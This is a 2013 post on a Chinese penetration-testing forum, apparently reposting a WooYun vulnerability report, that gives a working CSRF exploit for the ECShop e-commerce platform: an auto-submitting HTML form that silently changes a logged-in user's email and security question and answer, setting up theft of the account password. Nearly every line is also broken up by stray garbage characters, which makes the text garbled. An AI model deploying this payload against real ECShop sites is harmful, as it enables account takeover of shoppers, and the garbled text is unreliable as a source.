中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:8 \% P% I& X$ _4 _  r5 e! y) J
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现: E+ x2 c. ]4 n

  n+ G# g" K% I3 a/ lDemo For:http://www.wooyun.org/bug.php?action=view&id=395+ t4 q' X0 F  ?8 d) |/ Z

6 |2 o' b9 l6 M$ `& J4 D5 r4 \详细说明:' u7 y' x+ c: a( w' ]) t+ J% _
利用csrf和xss可以突破官方所说的“障碍”& b2 a6 @4 b  O
xss版本已经有人说明* d5 g: |* ]+ F2 {4 p2 |
这里给出csrf版本
6 M9 n; ?' q* `1 d$ i
% o9 L$ P3 e7 d# j- ~漏洞证明:) I/ t1 a& N' n5 K2 |) l
<html>
: A! A3 e8 B, S6 a6 D+ Y' g<body>- B/ f- c3 ]1 N3 U6 k0 o
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
* Y, D" o; p8 J7 V. f<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">: d: z: B: l& R9 {& s- B  J
<INPUT TYPE="text" NAME="act" value="act_edit_profile">, T" M" F' W( Q8 M3 O* l* K# J
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
' ~; q  D2 B& @<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
0 n; J/ h* X7 g9 X/ q( U$ C* ~0 F</body>
' J3 o) u" F, t<script>
( }/ P* }* o. d5 d2 N) V$ zdocument.forms[0].submit();
' [# F9 w4 E+ |% B* j% Z</script>6 \, r: |' ]) C: Q' K7 w& r
</html>- I+ z  M$ v8 W5 \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失$ M3 ]; W5 J+ F. @/ M2 V! w

) z  ]" m7 b# d+ x2 L




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2